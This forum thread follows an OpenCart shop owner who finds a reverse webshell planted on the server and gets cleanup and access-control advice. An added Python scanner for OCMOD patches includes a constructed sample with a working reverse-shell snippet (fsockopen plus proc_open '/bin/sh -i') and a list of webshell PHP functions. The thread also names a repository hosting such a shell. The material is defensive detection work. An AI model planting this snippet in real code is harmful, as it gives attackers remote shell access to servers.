Post by fietsknecht » Mon Jun 20, 2022 11:21 pm

I hope I'm posting in the right forum.
I made a copy of my OC3 installation by zipping the complete home directory and FTPing the zip to my home PC. Upon unzipping, Microsoft Defender gives a warning that Trojan:PHP/RevWebshell.YA!MTB is found in admin/controller/extension/extension/shell.php. The PHP file indeed looks weird (see attached zip). I have no idea how I got it on the server.
Anyone experienced something like this before?

Newbie, joined Fri Dec 27, 2019 9:03 pm

Post by ADD Creative » Tue Jun 21, 2022 12:41 am

Does look like some sort of malicious extension, intended to give someone access to the server. It looks like it requires admin access to use, so maybe it was installed as an extension. Check the oc_extension_path table in your database for that file to see if it was part of an extension. You could also check your FTP logs.

Probably best to change all your passwords related to your store and hosting.

www.add-creative.co.uk


Expert Member, joined Sat Jan 14, 2012 1:02 am, United Kingdom

Post by fietsknecht » Tue Jun 21, 2022 1:47 am

Thanks for your reply. I checked the oc_extension_path table in the database but could not find anything. My guess is the malicious PHP was put there by a so-called 'customer service representative' whom I granted access via an additional account when I was having trouble with some extension (I forget which one). Of course I disabled the additional account right after he/she was finished, but apparently that wasn't enough. I have now deleted the faulty PHP and changed all my hosting and store related passwords. I will investigate further to see which extension was meddled with and will follow up here.


Post by halfhope » Tue Jun 21, 2022 9:33 am

Hi!

Also check the oc_modification table; there should be a reverse shell. If the site is infected, send me a PM. Cleaning with a 1 year warranty.

My extensions at marketplace


Active Member, joined Tue Dec 10, 2013 9:44 pm, Russia, Chelyabinsk
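The two table checks recommended above (oc_extension_path by ADD Creative, oc_modification by halfhope) catch different things: oc_extension_path records files unpacked from an extension ZIP, while oc_modification holds OCMOD XML whose `<file path=...>` / `<add>` blocks patch existing files, and OpenCart 3 writes the patched copies under system/storage/modification rather than altering the originals. The script below is an added example, not code from this thread, from OpenCart or from the linked repository: it takes (name, xml) rows as you would get from `SELECT name, xml FROM oc_modification`, parses each OCMOD document and flags `<add>` blocks that inject shell-style PHP. The sample rows are constructed; the "Customer Service Helper" entry is an invented stand-in for the kind of patch a reverse shell is delivered in.

```python
"""Added example for this thread (not OpenCart code, not the poster's shell):
parse OCMOD XML as OpenCart 3 stores it in oc_modification.xml and flag
patches that inject webshell / reverse-shell style PHP."""
import re
import xml.etree.ElementTree as ET

# PHP calls that almost never belong in a legitimate OCMOD patch but are the
# building blocks of webshells and reverse shells. A hit is a lead to read,
# not proof on its own (base64_decode, for one, has honest uses).
SUSPICIOUS_CALLS = re.compile(
    r"\b(eval|assert|system|exec|shell_exec|passthru|popen|proc_open|"
    r"pcntl_exec|fsockopen|base64_decode|gzinflate|str_rot13)\s*\(",
    re.IGNORECASE,
)
# Request input reaching the same patch is the second half of the pattern.
REQUEST_INPUT = re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\b")


def scan_ocmod(name, xml_text):
    """Return one finding per <add> block whose code calls a suspicious function.

    name     -- the oc_modification.name column, used only for reporting
    xml_text -- the oc_modification.xml column (an OCMOD document)
    """
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError as exc:
        # A row OpenCart itself cannot parse is worth a look: report it.
        return [{"modification": name, "path": None, "position": None,
                 "calls": [], "uses_request_input": False,
                 "error": "unparseable XML: %s" % exc}]
    findings = []
    for file_el in root.iter("file"):
        target = file_el.get("path", "")          # file(s) the patch rewrites
        for op in file_el.findall("operation"):
            add = op.find("add")
            code = (add.text or "") if add is not None else ""
            calls = sorted({m.group(1).lower()
                            for m in SUSPICIOUS_CALLS.finditer(code)})
            if calls:
                findings.append({
                    "modification": name,
                    "path": target,
                    # OCMOD treats a missing position attribute as "replace"
                    "position": add.get("position", "replace"),
                    "calls": calls,
                    "uses_request_input": bool(REQUEST_INPUT.search(code)),
                })
    return findings


def scan_rows(rows):
    """rows: iterable of (name, xml) pairs as read from oc_modification."""
    out = []
    for name, xml_text in rows:
        out.extend(scan_ocmod(name, xml_text))
    return out


# Constructed sample rows standing in for SELECT name, xml FROM oc_modification.
# The first is a harmless cosmetic patch; the second is a made-up "helper"
# that bolts a socket-plus-shell method onto an admin controller.
SAMPLE_ROWS = [
    ("Admin Menu Tweak", """<modification>
  <name>Admin Menu Tweak</name><code>admin_menu_tweak</code>
  <version>1.0</version><author>constructed sample</author>
  <file path="admin/controller/common/column_left.php">
    <operation>
      <search><![CDATA[$data['menus'][] = array(]]></search>
      <add position="before"><![CDATA[// menu marker, nothing executable]]></add>
    </operation>
  </file>
</modification>"""),
    ("Customer Service Helper", """<modification>
  <name>Customer Service Helper</name><code>cs_helper</code>
  <version>1.0</version><author>constructed sample</author>
  <file path="admin/controller/common/header.php">
    <operation>
      <search><![CDATA[class ControllerCommonHeader extends Controller {]]></search>
      <add position="after"><![CDATA[
    public function cmd() {
        $sock = fsockopen($_GET['h'], (int)$_GET['p']);
        proc_open('/bin/sh -i', array(0 => $sock, 1 => $sock, 2 => $sock), $pipes);
    }]]></add>
    </operation>
  </file>
</modification>"""),
]

if __name__ == "__main__":
    for finding in scan_rows(SAMPLE_ROWS):
        print(finding)
```

A hit is a lead, not a verdict: exec and base64_decode have legitimate uses, so read the flagged block before acting. Because OCMOD leaves the original source files untouched, grepping the checkout for the shell misses these patches; scan the database rows (as here) or the generated copies under system/storage/modification. A dropped file such as shell.php that appears in neither table was most likely written directly, over FTP or by the shell itself, which is why the FTP logs matter.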

Post by fietsknecht » Wed Jun 22, 2022 2:29 am

halfhope wrote:
Tue Jun 21, 2022 9:33 am
Also check the oc_modification table; there should be a reverse shell.
Thanks! Somehow https://github.com/miklcct/opencart_reverse_shell was installed on my system. I managed to remove all the files.
Still don't know how it got there. Don't trust these developers that ask for access to your admin, is all I can say.


Post by halfhope » Thu Jun 23, 2022 2:07 am

fietsknecht wrote:
Wed Jun 22, 2022 2:29 am
Don't trust these developers that ask for access to your admin is all I can say.
Most work with OpenCart requires access to the admin panel and FTP.
1. Create separate credentials (FTP/admin) for developers. Disable them or change the password after finishing work.
2. Use password generators, don't create your own password.
3. Watch for all changes in files. You can use my extension FSMonitor for that.
4. Make regular backups of files and databases.

My extensions at marketplace

